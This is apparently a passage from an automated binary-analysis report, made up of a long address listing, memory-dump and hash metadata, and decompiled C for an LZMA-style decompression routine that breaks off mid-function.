                                                                                                        0x004064bf
                                                                                                        0x004064c2
                                                                                                        0x004064c5
                                                                                                        0x004064c8
                                                                                                        0x004064c9
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064cb
                                                                                                        0x004064ce
                                                                                                        0x004064d1
                                                                                                        0x004064d4
                                                                                                        0x004064d7
                                                                                                        0x004064d7
                                                                                                        0x004064da
                                                                                                        0x004064dc
                                                                                                        0x004064dc
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x004064df
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x00000000
                                                                                                        0x004061be
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f2
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x004063ff
                                                                                                        0x00406402
                                                                                                        0x00406405
                                                                                                        0x00406408
                                                                                                        0x0040640b
                                                                                                        0x0040640d
                                                                                                        0x00406414
                                                                                                        0x00406415
                                                                                                        0x00406417
                                                                                                        0x0040641a
                                                                                                        0x0040641d
                                                                                                        0x00406420
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x00406425
                                                                                                        0x004063d6
                                                                                                        0x004063d9
                                                                                                        0x004063dc
                                                                                                        0x004063e6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x00000000
                                                                                                        0x00406509
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062a8
                                                                                                        0x004062ae
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004062b0
                                                                                                        0x004062b3
                                                                                                        0x004062b6
                                                                                                        0x004062b9
                                                                                                        0x004062bc
                                                                                                        0x004062bf
                                                                                                        0x004062c2
                                                                                                        0x004062c5
                                                                                                        0x004062c8
                                                                                                        0x004062cb
                                                                                                        0x004062ce
                                                                                                        0x004062e6
                                                                                                        0x004062e9
                                                                                                        0x004062ec
                                                                                                        0x004062ef
                                                                                                        0x004062ef
                                                                                                        0x004062f2
                                                                                                        0x004062f6
                                                                                                        0x004062f8
                                                                                                        0x004062d0
                                                                                                        0x004062d0
                                                                                                        0x004062d8
                                                                                                        0x004062dd
                                                                                                        0x004062df
                                                                                                        0x004062e1
                                                                                                        0x004062e1
                                                                                                        0x004062fb
                                                                                                        0x00406302
                                                                                                        0x00406305
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00000000
                                                                                                        0x00406307
                                                                                                        0x00406305
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x0040630c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406347
                                                                                                        0x00406347
                                                                                                        0x0040634b
                                                                                                        0x00406953
                                                                                                        0x00000000
                                                                                                        0x00406953
                                                                                                        0x00406351
                                                                                                        0x00406354
                                                                                                        0x00406357
                                                                                                        0x0040635b
                                                                                                        0x0040635e
                                                                                                        0x00406364
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406366
                                                                                                        0x00406369
                                                                                                        0x0040636c
                                                                                                        0x0040636c
                                                                                                        0x00406372
                                                                                                        0x00406310
                                                                                                        0x00406310
                                                                                                        0x00406313
                                                                                                        0x00000000
                                                                                                        0x00406313
                                                                                                        0x00406374
                                                                                                        0x00406374
                                                                                                        0x00406377
                                                                                                        0x0040637a
                                                                                                        0x0040637d
                                                                                                        0x00406380
                                                                                                        0x00406383
                                                                                                        0x00406386
                                                                                                        0x00406389
                                                                                                        0x0040638c
                                                                                                        0x0040638f
                                                                                                        0x00406392
                                                                                                        0x004063aa
                                                                                                        0x004063ad
                                                                                                        0x004063b0
                                                                                                        0x004063b3
                                                                                                        0x004063b3
                                                                                                        0x004063b6
                                                                                                        0x004063ba
                                                                                                        0x004063bc
                                                                                                        0x00406394
                                                                                                        0x00406394
                                                                                                        0x0040639c
                                                                                                        0x004063a1
                                                                                                        0x004063a3
                                                                                                        0x004063a5
                                                                                                        0x004063a5
                                                                                                        0x004063bf
                                                                                                        0x004063c6
                                                                                                        0x004063c9
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x004063cb
                                                                                                        0x00000000
                                                                                                        0x00406658
                                                                                                        0x00406658
                                                                                                        0x0040665c
                                                                                                        0x00406983
                                                                                                        0x00000000
                                                                                                        0x00406983
                                                                                                        0x00406662
                                                                                                        0x00406665
                                                                                                        0x00406668
                                                                                                        0x0040666c
                                                                                                        0x0040666f
                                                                                                        0x00406675
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x00406677
                                                                                                        0x0040667a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406767
                                                                                                        0x0040676b
                                                                                                        0x0040678d
                                                                                                        0x00406790
                                                                                                        0x0040679a
                                                                                                        0x00000000
                                                                                                        0x0040679a
                                                                                                        0x0040676d
                                                                                                        0x00406770
                                                                                                        0x00406774
                                                                                                        0x00406777
                                                                                                        0x00406777
                                                                                                        0x0040677a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406824
                                                                                                        0x00406828
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x00406846
                                                                                                        0x0040684d
                                                                                                        0x00406854
                                                                                                        0x0040685b
                                                                                                        0x0040685b
                                                                                                        0x00000000
                                                                                                        0x0040685b
                                                                                                        0x0040682a
                                                                                                        0x0040682d
                                                                                                        0x00406830
                                                                                                        0x00406833
                                                                                                        0x0040683a
                                                                                                        0x0040677e
                                                                                                        0x0040677e
                                                                                                        0x00406781
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406915
                                                                                                        0x00406918
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040654f
                                                                                                        0x00406551
                                                                                                        0x00406558
                                                                                                        0x00406559
                                                                                                        0x0040655b
                                                                                                        0x0040655e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406566
                                                                                                        0x00406569
                                                                                                        0x0040656c
                                                                                                        0x0040656e
                                                                                                        0x00406570
                                                                                                        0x00406570
                                                                                                        0x00406571
                                                                                                        0x00406574
                                                                                                        0x0040657b
                                                                                                        0x0040657e
                                                                                                        0x0040658c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406862
                                                                                                        0x00406862
                                                                                                        0x00406865
                                                                                                        0x0040686c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406871
                                                                                                        0x00406871
                                                                                                        0x00406875
                                                                                                        0x004069ad
                                                                                                        0x00000000
                                                                                                        0x004069ad
                                                                                                        0x0040687b
                                                                                                        0x0040687e
                                                                                                        0x00406881
                                                                                                        0x00406885
                                                                                                        0x00406888
                                                                                                        0x0040688e
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406890
                                                                                                        0x00406893
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406896
                                                                                                        0x00406899
                                                                                                        0x00406899
                                                                                                        0x0040689d
                                                                                                        0x004068fd
                                                                                                        0x00406900
                                                                                                        0x00406905
                                                                                                        0x00406906
                                                                                                        0x00406908
                                                                                                        0x0040690a
                                                                                                        0x0040690d
                                                                                                        0x00000000
                                                                                                        0x0040690d
                                                                                                        0x0040689f
                                                                                                        0x004068a5
                                                                                                        0x004068a8
                                                                                                        0x004068ab
                                                                                                        0x004068ae
                                                                                                        0x004068b1
                                                                                                        0x004068b4
                                                                                                        0x004068b7
                                                                                                        0x004068ba
                                                                                                        0x004068bd
                                                                                                        0x004068c0
                                                                                                        0x004068d9
                                                                                                        0x004068dc
                                                                                                        0x004068df
                                                                                                        0x004068e2
                                                                                                        0x004068e6
                                                                                                        0x004068e8
                                                                                                        0x004068e8
                                                                                                        0x004068e9
                                                                                                        0x004068ec
                                                                                                        0x004068c2
                                                                                                        0x004068c2
                                                                                                        0x004068ca
                                                                                                        0x004068cf
                                                                                                        0x004068d1
                                                                                                        0x004068d4
                                                                                                        0x004068d4
                                                                                                        0x004068ef
                                                                                                        0x004068f6
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x004068f8
                                                                                                        0x00000000
                                                                                                        0x00406594
                                                                                                        0x00406597
                                                                                                        0x004065cd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x004066fd
                                                                                                        0x00406700
                                                                                                        0x00406700
                                                                                                        0x00406703
                                                                                                        0x00406705
                                                                                                        0x0040698f
                                                                                                        0x00000000
                                                                                                        0x0040698f
                                                                                                        0x0040670b
                                                                                                        0x0040670e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406714
                                                                                                        0x00406718
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x0040671b
                                                                                                        0x00000000
                                                                                                        0x0040671b
                                                                                                        0x00406599
                                                                                                        0x0040659b
                                                                                                        0x0040659d
                                                                                                        0x0040659f
                                                                                                        0x004065a2
                                                                                                        0x004065a3
                                                                                                        0x004065a5
                                                                                                        0x004065a7
                                                                                                        0x004065aa
                                                                                                        0x004065ad
                                                                                                        0x004065c3
                                                                                                        0x004065c8
                                                                                                        0x00406600
                                                                                                        0x00406600
                                                                                                        0x00406604
                                                                                                        0x00406630
                                                                                                        0x00406632
                                                                                                        0x00406639
                                                                                                        0x0040663c
                                                                                                        0x0040663f
                                                                                                        0x0040663f
                                                                                                        0x00406644
                                                                                                        0x00406644
                                                                                                        0x00406646
                                                                                                        0x00406649
                                                                                                        0x00406650
                                                                                                        0x00406653
                                                                                                        0x00406680
                                                                                                        0x00406680
                                                                                                        0x00406683
                                                                                                        0x00406686
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x004066fa
                                                                                                        0x00000000
                                                                                                        0x004066fa
                                                                                                        0x00406688
                                                                                                        0x0040668e
                                                                                                        0x00406691
                                                                                                        0x00406694
                                                                                                        0x00406697
                                                                                                        0x0040669a
                                                                                                        0x0040669d
                                                                                                        0x004066a0
                                                                                                        0x004066a3
                                                                                                        0x004066a6
                                                                                                        0x004066a9
                                                                                                        0x004066c2
                                                                                                        0x004066c4
                                                                                                        0x004066c7
                                                                                                        0x004066c8
                                                                                                        0x004066cb
                                                                                                        0x004066cd
                                                                                                        0x004066d0
                                                                                                        0x004066d2
                                                                                                        0x004066d4
                                                                                                        0x004066d7
                                                                                                        0x004066d9
                                                                                                        0x004066dc
                                                                                                        0x004066e0
                                                                                                        0x004066e2
                                                                                                        0x004066e2
                                                                                                        0x004066e3
                                                                                                        0x004066e6
                                                                                                        0x004066e9
                                                                                                        0x004066ab
                                                                                                        0x004066ab
                                                                                                        0x004066b3
                                                                                                        0x004066b8
                                                                                                        0x004066ba
                                                                                                        0x004066bd
                                                                                                        0x004066bd
                                                                                                        0x004066ec
                                                                                                        0x004066f3
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x0040667d
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x00000000
                                                                                                        0x004066f5
                                                                                                        0x004066f3
                                                                                                        0x00406606
                                                                                                        0x00406609
                                                                                                        0x0040660b
                                                                                                        0x0040660e
                                                                                                        0x00406611
                                                                                                        0x00406614
                                                                                                        0x00406616
                                                                                                        0x00406619
                                                                                                        0x0040661c
                                                                                                        0x0040661c
                                                                                                        0x0040661f
                                                                                                        0x0040661f
                                                                                                        0x00406622
                                                                                                        0x00406629
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x004065fd
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00000000
                                                                                                        0x0040662b
                                                                                                        0x00406629
                                                                                                        0x004065af
                                                                                                        0x004065b2
                                                                                                        0x004065b4
                                                                                                        0x004065b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406316
                                                                                                        0x00406316
                                                                                                        0x0040631a
                                                                                                        0x0040695f
                                                                                                        0x00000000
                                                                                                        0x0040695f
                                                                                                        0x00406320
                                                                                                        0x00406323
                                                                                                        0x00406326
                                                                                                        0x00406329
                                                                                                        0x0040632c
                                                                                                        0x0040632f
                                                                                                        0x00406332
                                                                                                        0x00406334
                                                                                                        0x00406337
                                                                                                        0x0040633a
                                                                                                        0x0040633d
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x0040633f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x0040671e
                                                                                                        0x00406722
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406728
                                                                                                        0x0040672b
                                                                                                        0x0040672e
                                                                                                        0x00406731
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406733
                                                                                                        0x00406736
                                                                                                        0x00406739
                                                                                                        0x0040673c
                                                                                                        0x0040673f
                                                                                                        0x00406742
                                                                                                        0x00406745
                                                                                                        0x00406746
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x00406748
                                                                                                        0x0040674b
                                                                                                        0x0040674e
                                                                                                        0x00406751
                                                                                                        0x00406754
                                                                                                        0x00406757
                                                                                                        0x0040675b
                                                                                                        0x0040675d
                                                                                                        0x00406760
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00000000
                                                                                                        0x00406762
                                                                                                        0x00406760
                                                                                                        0x00406995
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.248371390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.248309082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248454686.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248459758.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248475824.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248501267.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000000.00000002.248529571.0000000000444000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                        • Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
                                                                                                        • Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
                                                                                                        • Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405F82, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 98%
                                                                                                        			E00405F82(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
